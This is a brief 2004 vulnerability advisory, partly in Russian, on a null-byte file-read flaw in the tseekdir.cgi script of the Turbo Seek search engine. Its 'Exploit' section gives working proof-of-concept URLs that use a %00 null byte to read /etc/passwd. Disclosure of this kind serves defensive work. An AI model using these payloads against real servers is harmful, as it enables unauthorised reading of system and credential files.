+~~~| Advisory #17. Search Engine & Directory by Turbo Seek 

 Software:      Search Engine & Directory Powered by Turbo Seek    
 Vendor:        FocalMedia.Net http://www.focalmedia.net                            
 Vulnerability: возможность чтения файлов 
 Risk:          средний                                
 Date:          10'Sept 2004                                  
 
 discovered by durito -durito[at]mail[dot]ru-             
  HTTP:         www.lwb57.org     
  IRC:          irc.lwb57.org:6667  #lwb      

+~~~:| Details |: 

 Скрипт tseekdir.cgi не выполняет проверку на "null-byte poison"

+~~~:| Exploit |:   					

 www.victim.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
 www.victim.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd%00



 
(c) 2004 copyright by LwB Security Team. all rights reserved